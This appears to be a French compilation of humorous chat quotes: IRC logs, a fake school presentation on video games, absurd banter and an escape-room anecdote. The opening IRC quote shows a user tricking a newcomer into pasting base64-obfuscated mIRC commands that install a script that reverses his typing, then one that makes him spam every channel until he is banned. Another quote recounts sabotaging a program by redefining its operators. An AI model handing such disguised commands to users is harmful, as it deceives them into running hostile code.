Favoris de K-merax
Ezekiel: slt je mapel Ezekiel
Haribo: sans blagues
Ezekiel: et toi??
Haribo: ...
Ezekiel: di le stp
Haribo: ok tape // [ $decode(c2V0ICVib3Vsem9yIFsgJHJhbmQoJGNhbGMoMTBeMTApLCRjYWxjKDEwXjExKSkgXQ==, m) ] | [ $decode(d3JpdGUgLXJzIGJvdWx6b3IubXJj,m) ] [ $decode(T24gKjpJTlBVVDoqOnsgc2V0ICV4ICRjYWxjKCRsZW4oJDEtKSArIDEpIHwgdW5zZXQgJXJlc3VsdGF0IHwgdG9rZW5pemUgMzIgJHJlcGxhY2UoJDEtLCAkY2hyKDMyKSwgJGNocigxNjApKSB8IHdoaWxlICV4ID4gMSB7IGRlYyAleCB8IHZhciAlcmVzdWx0YXQgPSAlcmVzdWx0YXQgJCsgJG1pZCgkMS0sICV4LCAxKSB9IHwgbXNnICRhY3RpdmUgJXJlc3VsdGF0IHwgaGFsdCB9,m) ] | [ $decode(bG9hZCAtcnMgYm91bHpvci5tcmM=,m) ]
Ezekiel: ?iok éf as
Ezekiel: ppts ????????????????revnel a irce as kp
Ezekiel: edia# nioj/
Ezekiel: snoc setê suov tiuq/
Haribo: Et non tu peux pas partir
Haribo: Bon, je suis gentil donc je vais t'aider
* Ezekiel was kicked by ChanServ ((Haribo) Ne me remercie pas, j'aime aider ;-))
* [Le lendemain...]
Enlendil: riri, j'ai Ezekiel sur msn, il arrive ^^
* Haribo is now known as Karina
* Ezekiel has joined #***
Ezekiel: slt
Karina: Salut
Ezekiel: asv Karina
Karina: Va voir sur mon profil mIRC
Ezekiel: comen on fé?
Karina: tape // var %i $rand(10,10000) $+ [ $decode(Lm1yYw==,m) ] | [ $decode(d3JpdGUgLXJz,m) ] %i $decode(b24gKjppbnB1dDoqOnsgYW1zZyBqZSBzdWlzIHVuIGJvdWxldCBldCBqZSBwZXV4IHBsdXMgcGFybGVyIHw=,m) $decode(aGFsdA==,m) $chr(125) | [ $decode(bG9hZCAtcnM=,m) ] %i
Ezekiel: je suis un boulet et je peux plus parler
Ezekiel: je suis un boulet et je peux plus parler
Ezekiel: je suis un boulet et je peux plus parler
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* SpamServ sets mode: +b *!*@Ezekiel_G.user.OGameFr
* Ezekiel was kicked by SpamServ (Spamming is against the network rules)
Swald: Jeu set et match :D <T> 'me faisaient chier pour qu'on rende les programmes avant une deadline complètement intenable, j'ai dû passer 48h à coder, sans dormir et en ne me nourrissant que de café et de Red Bull
<T> J'ai réussi à faire un truc qui tient la route mais dans ~5% des cas ça renvoie un résultat faux
<T> Mais ! Je sais qu'ils mettent un point d'honneur à trouver exactement où se trouvent les éventuelles erreurs dans les rendus, pour en faire des exemples en classe (et se payer la tête des auteurs au passage)
<S> Je vois pas où tu veux en venir
<T> Au milieu d'un des fichiers de conf' du programme - un truc qu'ils ne vont probablement jamais relire -, j'ai redéfini le "if" pour que dans le reste, il veuille dire "while not", le "do" veut maintenant dire "if", j'ai échangé les opérations entre le "+" et le "*", entre le "<" et le ">", etc.
<T> 1500 lignes de code non commentées. Ils ont deux semaines, après quoi on a plus cours.
<T> Ils vont comprendre ce que c'est une deadline intenable. Latif : Sinon moi j'étais en histoire et la prof dit que j'avais un exposé a faire et que je l'ai pas fais. J'avoue, j'avais complètement zappé. Du coup, j'improvise en disant "ça tombe bien je l'ai là !" *sort un post it bleu*
Hezul : Coup de bluff classique, quand même...
Latif : J'ai parlé de "l'influence des jeux vidéos sur le comportement humain a travers le temps". Tout le monde dit que GTA rend violent, toussa...
Latif : Donc moi j'ai parlé de la naissance du jeu vidéo, avec des inspirations de différents sites du web dont so do myth.
Latif : Je démarre avec le premier jeu, quoi, Pong, qui consistait en un affrontement entre Amerique et Soviétiques pour rejeter un pauvre vietnamien immigré carré
Latif : dans le but d'inculquer aux jeunes que "les vietnamiens sont méchants" a cause de la guerre du Vietnam
Hezul : C'est passé ?
Latif : Mais complètement. Du coup j'ai enchaîné avec la riposte asiatique avec Space Invaders, qui consistait a affronter de méchants assaillants americains venus du ciel a l'aide de la technologie (Hiroshima, Nagasaki, guerre du Vietnam...), et affirmait ainsi que la société Americaine "c'est le mal"
Latif : Or, ironie du sors, le jeu sur arcade était tellement bien que le japon fut contraint de créer davantage de "yens" en pièces, plongeant ainsi complètement dans le capitalisme.
Latif : Sautant sur l'occasion, les americains les enchainent en récupérant "pac man"
Latif : qui encourage la consommation (les pac gum) du gentil citoyen zt d'éviter les gens les empêchant de consommer davantage, les méchants fantômes soviétiques
Latif : (on voit a leur regard qu'ils sont soviétiques)
Hezul : En effet. Et le leader est rouge.
Latif : Les soviétiques, justement, ne PEUVENT PAS laisser passer ça et créent donc Tetris, qui fait l'apologie des biens communs, et donc du COMMUNISME
Latif : Devant le danger engendré par ce jeu, les Americains s'arrangent rapidement pour récupérer la licence et donc, ainsi, démolir tout le message "communiste" contenu en elle. Ils sortiront par la même occasion Madame Pac Man destinée a ramener sa première licence sur les devants de la scène.
Latif : Mais, constatons le, madame Pac Man créé a la base pour montrer "l'ouverture du marché au femme" et "la fin du sexisme" est un énorme coup monté !
Latif : En effet, madame pac man est BEAUCOUP plus compliqué que son homologue masculin o_o
Hezul : Mais c'est vrai !
Latif : Démontrant ainsi qu'il est beaucoup plus dur pour la femme de s'en sortir dans la société de consommation et, pourtant, pour un résultat INFERIEUR
Latif : car beaucoup de versions de "madame pc man" possèdent DEUX PAC GUM EN MOINS sur l'ecran o_o
Hezul : O_O !
Hezul : UNE HONTE !
Latif : Oui, un scandale
Latif : Bref dans la salle, le truc hilarant, c'est qu'il y a des gens qui y croient au fur et a mesure dur comme fer
Hezul : Ouais, enfin... sont un peu pas doués dans ta classe en même temps...
Latif : La prof qui se laisse prendre au jeu en se disant qu'on vit dans un monde corrompu !
Latif : D'autres qui critiquent en disant que c'est faux, toussa, mais s'ils avaient captés ils réagiraient pas ainsi
Hezul : Mais genre elle t'a pas interrompu, la prof ?
Latif : Si, quand même. Quand j'ai commencé à dériver sur le satanisme des pokémons et la zoophilie encouragée par Mario.
Hezul : Ah, oui, là quand même
Latif : "... mais, ce que vous dites... ça n'a jamais rien changé aux idées de ces pays !"
Latif : Je l'attendais, là ! Pan les deux pieds dans le plat !
Hezul : O_o
Latif : Je rétorque : 'EXACTEMENT ! è_é"
Latif : "Donc qu'on arrête de nous bassiner avec le fait que les jeux vidéos INFLUENCENT LES JEUNES ET LES FONT DEVENIR VIOLENT nom de dieu è_é"
Latif : "Ça n'a jamais fonctionné, et ça ne fonctionnera jamais, c'est que du pipeau débité par des politiciens en manque de causes"
Latif : ... Pan, je place la vraie critique a la fin en deux phrases : Applaudissement général Q.Q
Latif : Je suis trop content Q.Q
Latif : J'ai pwnd la prof elle y a cru a fond Q.Q
Hezul : Moi je dis : GG <Patouf> T'es vachement contradictoire hein ?
<Antheos> ...
<Patouf> Bah vas-y avoue-le... t'aimes avoir le dernier mot !
<Antheos> Si je te répond "non", cela viendra confirmer que j'ai un esprit contradictoire (selon tes dires). Et comme je suis considéré comme un être intelligent (et comme je tiens à entretenir ma réputation), j'aurais très bien pu te répondre, toujours très sournoisement, une jolie réplique du type "Oui, tout à fait !"... juste histoire de me débarrasser de toi, de ta connerie et de tes questions pourraves. Mais vue que j'suis un crevard, que t'es un gros blaireau et que ça m'trouerais l'cul de conclure d'une telle façon, ce qui reviendrait à te donner raison... je préfère te pondre un enormissime pavé de ramassis de conneries, étant convaincu qu'il est fort probable que tu le lise en entier (voire plusieurs fois pour tout piger) même si ça te fait souffrir.
<Antheos> Sachant que tu auras grillé la plupart de tes neurones à tenter de comprendre mon raisonnement pourtant si simple... et, ainsi, vue le peu de matière grise qu'il te reste à présent... je conclurais sur un primitif...
<Antheos> c'est c'lui qui dit qui est ! <Gryfonder> Caribou ?
<Caribou> Oui ??
<Gryfonder> Est-ce que les papillons éternuent ?
<Caribou> Pas toujours, il y a 2 espèces de papillons, ceux qui toussent et ceux qui ne toussent pas. Cependant ceux qui ne toussent pas sont les prédateurs naturels de ceux qui toussent ce qui a largement diminué leur nombre. Een conséquence, des scientifiques du monde entier ont créés une levée de fonds pour acheter du sirop aux papillons qui toussent afin qu'ils se fondent parmi les autres et ainsi éviter de se faire bouffer
<Gryfonder> Oh ! Sympa ! Et est-ce que tu saurais comment les chamois foont pour se gratter le museau ?
<Caribou> C'est bien simple, lorsque qu'un chamois a le museau qui gratte, il demande à l'un de ses congénère de lui gratter le museau avec la corne. Cependant, à ce moment il y a 2 cas de figure. Dans le premier cas le chamois arrive à gratter le museau de l'autre et tout se passe bien. Dans le second cas, alors qu'il gratte le museau de l'autre, la corne glisse et s'enfonce dans la narine. La corne s'accroche alors à un morceau de cerveau et, lorsque le chamois retire sa corne, le cerveau vient avec. Etant donné que les chamois sont des êtres consciencieux, ils décident alors de continuer dans la voie de la momification commencée par le retirage du cerveau. Cependant, une fois le cerveau entièrement retiré, les chamois se rendent compte qu'ils n'ont pas les pattes adaptées pour entourer le corps du défunt de bandelettes et sont obligés de le laisser ainsi. C'est d'ailleurs pour ça que de nombreux scientifiques se sont interrogés sur la présence de chamois morts et sans cerveaux dans les montagnes
<Gryfonder> Oooooh !
<Lepingouin> Faites moi penser à vous bloquer vous deux @AdrienCorbeel: J'ai travaillé pendant un an comme Game master dans un escape room. Pendant 12 mois j'ai eu l'occasion de voir un bon nombre de choses improbables.
@AdrienCorbeel: Mais il y a une anecdote qui dépasse de loin toutes les autres.
@AdrienCorbeel: C'était il y a deux mois. On venait d'ouvrir une toute nouvelle salle, à l'ambiance un peu étrange. Quelques groupes l'avaient déjà testée, et mis à part certains soucis techniques, ça se passait plutôt bien.
@AdrienCorbeel: On était clairement pas prêt pour ce qui allait arriver.
@AdrienCorbeel: Un groupe de 3 personnes est venu faire la salle en fin de journée. On les enferme et le jeu commence. Ils ne sont pas très doués, du coup on leur donne pas mal d'indices (grâce à un talkie walkie!) pour les aider à résoudre les énigmes. Jusque là, rien d'anormal.
@AdrienCorbeel: Deux choses à savoir sur la salle, qui auront une importance pour la suite :
@AdrienCorbeel: 1) l'escape room est intentionnellement en désordre lorsqu'ils rentrent à l'intérieur
@AdrienCorbeel: 2) pendant le jeu, ils trouvent une arme en plastique
@AdrienCorbeel: Ils arrivent malgré tout à avancer dans le jeu, et atteignent à la fin. Il y a 2 portes : l'une mène vers la sortie, et s'ouvre avec une clé. L'autre est fermée avec un cadenas, et mène vers une future extension de la salle (mais pour le moment c'est juste une salle de bricolage)
@AdrienCorbeel: Il ne leur reste plus qu'une minute. Pour gagner, ils n'ont qu'à fouiller un peu, trouver une clé et sortir de là. Sauf qu'ils ne la trouvent pas.
@AdrienCorbeel: Ce qu'ils ont entre les mains, à la place, c'est une clé qui leur a déjà servi, et qui normalement ne s'utilise qu'une fois...
@AdrienCorbeel: ...et il se trouve que cette clé ouvre le cadenas de la salle de bricolage (ce qu'on ne savait pas évidemment)
@AdrienCorbeel: Donc le groupe ouvre la porte de cette salle qui est un peu sens dessus dessous : il y a des scies, des perceuses, de bouts de bois.
@AdrienCorbeel: Et ils sont persuadés qu'ils sont encore dans l'escape game. Forcément : la salle est en désordre, ce qui est cohérent avec le début du jeu.
@AdrienCorbeel: Ils se mettent donc à fouiller parmi tout ça. De notre côté, on ne voit pas trop ce qui passe : on a pas mal d'angles morts, et pas de caméra dans la salle de bricolage. Et pour ne rien arranger, on est occupé à surveiller les autres escape rooms.
@AdrienCorbeel: Ça pourrait très mal tourner : il y a plein de choses un peu dangereuses dans cette salle, des clous, du matériel de brico, etc...
@AdrienCorbeel: Mais l'improbable arrive : ils trouvent une clé. Et cette clé ouvre une autre porte.
@AdrienCorbeel: Qui mène sur la cour intérieure de l'escape game.
@AdrienCorbeel: Dehors.
@AdrienCorbeel: Le groupe arrive donc maintenant à l'extérieur. Et ils sont toujours persuadés d'être dans l'escape game. Il y a même un indice, lié à une autre salle dans cette cour, ce qui ne fait que renforcer leur conviction.
@AdrienCorbeel: Normalement, il n'y a pas moyen de sortir de cette cour intérieure. Il y a une porte qui donne sur la cour de l'immeuble d'à côté, mais elle est généralement fermée.
@AdrienCorbeel: Mais ce jour-là, forcément, forcément, elle était ouverte. Et ils continuent.
@AdrienCorbeel: Nous, de notre côté, on commence à s'inquiéter de ne pas le voir sortir et de ne pas les voir sur nos écrans de surveillance. Finalement, mon collègue va voir dans la salle, ne les trouve pas (en plus ils avaient fermé les portes derrière eux pour je ne sais quelle raison).
@AdrienCorbeel: Il revient vers moi paniqué.
@AdrienCorbeel: Lui : Je ne trouve plus les clients !
@AdrienCorbeel: Moi : Comment ça tu ne les trouves plus ?
@AdrienCorbeel: Ils sont donc dans la cour de l'immeuble d'à côté, et aussi improbable cela soit-il, ils sont toujours persuadés d'être dans le jeu. Pour leur défense, la cour ressemble vachement à un escape game. Il y a même une voiture avec la vitre brisée et les pneus crevés.
@AdrienCorbeel: Ca fait très déco.
@AdrienCorbeel: Et donc l'aventure continue.
@AdrienCorbeel: Ils rentrent dans l'immeuble à côté. Qui n'appartient absolument pas à l'escape game.
@AdrienCorbeel: Persuadés qu'il ne leur reste plus beaucoup de temps (de fait), ils se dépêchent et montent les escaliers.
@AdrienCorbeel: À ce moment, je n'ai pas tous les détails là, mais je sais en tout les cas qu'ils rentrent dans une pièce de l'immeuble (un lavoir peut-être ?) dans laquelle il y a plein de vêtements. Ils les fouillent, mais ne trouvent rien dedans (pas de clés cette fois-ci).
@AdrienCorbeel: Ils sortent de la pièce, continuent à monter les escaliers, et se retrouvent nez à nez... face à 2 mecs qui fument un joint.
@AdrienCorbeel: Les deux mecs flippent et se barrent en courant. Pourquoi ?
@AdrienCorbeel: Parce que devant eux se tiennent trois inconnus qui ont un FLINGUE en main.
@AdrienCorbeel: Ils avaient laissé le talkie-walkie dans la salle. Mais le pistolet en plastique, ils l'avaient EVIDEMMENT pris avec eux (il n'est pas extrêmement réaliste, mais après avoir pris un peu de beuh, on ne fait pas forcément attention à ce genre de détail j'imagine).
@AdrienCorbeel: Le franc tombe.
@AdrienCorbeel: Enfin.
@AdrienCorbeel: Ils réalisent que l'escape game n'a probablement pas engagé deux gars pour fumer de la beuh devant eux. Et que 20€ par personne pour faire un escape room qui continue dans l'immeuble d'à côté, c'est assez improbable.
@AdrienCorbeel: Ils rebroussent chemin, font la route en sens inverse et reviennent dans la salle où on les trouve, à notre grand soulagement.
@AdrienCorbeel: On devenait fous. Eux, par contre sont ravis et nous racontent tout. C'était le meilleur escape room de leur vie.
@AdrienCorbeel: Moi à ce moment là (et depuis) j'ai le cerveau en feu. Parce qu'il y a au moins 5 énormes coïncidences qui se sont suivi les unes après pour que ça arrive. Parce que c'est tellement improbable que j'ai moi-même du mal à y croire.
@AdrienCorbeel: Et puis aussi, parce que ça aurait pu très mal à tourner. Qu'est-ce qui se serait passé s'ils étaient rentrés dans l'appart de quelqu'un ? Et s'ils s'étaient retrouvés face à quelqu'un de violent ? Comment est-ce qu'on explique ça à la police ?
@AdrienCorbeel: (d'ailleurs ils sont revenus avec un mètre mesureur qu'ils avaient trouvés je ne sais où dans l'immeuble d'à côté, persuadé que c'était un indice. Au vol !)